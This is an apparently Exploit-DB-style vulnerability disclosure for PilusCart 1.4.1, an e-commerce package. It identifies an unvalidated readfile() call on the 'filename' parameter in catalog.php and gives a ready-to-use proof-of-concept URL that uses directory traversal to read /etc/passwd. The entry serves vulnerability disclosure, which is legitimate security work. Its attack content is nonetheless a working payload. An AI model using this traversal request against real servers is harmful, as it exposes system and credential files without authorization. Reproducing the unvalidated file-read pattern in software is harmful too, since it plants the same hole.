PilusCart 1.4.1 - Local File Disclosure
Author: Damian Ebelties
type: webapps
platform: php
port: 80.0
date_added: 2019-08-29
date_updated: 2019-08-29
verified: 0
codes:
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comPiLUS-1.4.1-Ubiungu-stable.zip
# Exploit Title: PilusCart <= 1.4.1 - Local File Disclosure
# Date: 29 August 2019
# Exploit Author: Damian Ebelties (https://zerodays.lol/)
# Vendor Homepage: https://sourceforge.net/projects/pilus/
# Version: <= 1.4.1
# Tested on: Ubuntu 18.04.1
The e-commerce software 'PilusCart' is not validating the 'filename' passed correctly,
which leads to Local File Disclosure.
As of today (29 August 2019) this issue is unfixed.
Vulnerable code: (catalog.php on line 71)
readfile("$direktori$filename");
Proof-of-Concept:
https://domain.tld/catalog.php?filename=../../../../../../../../../etc/passwd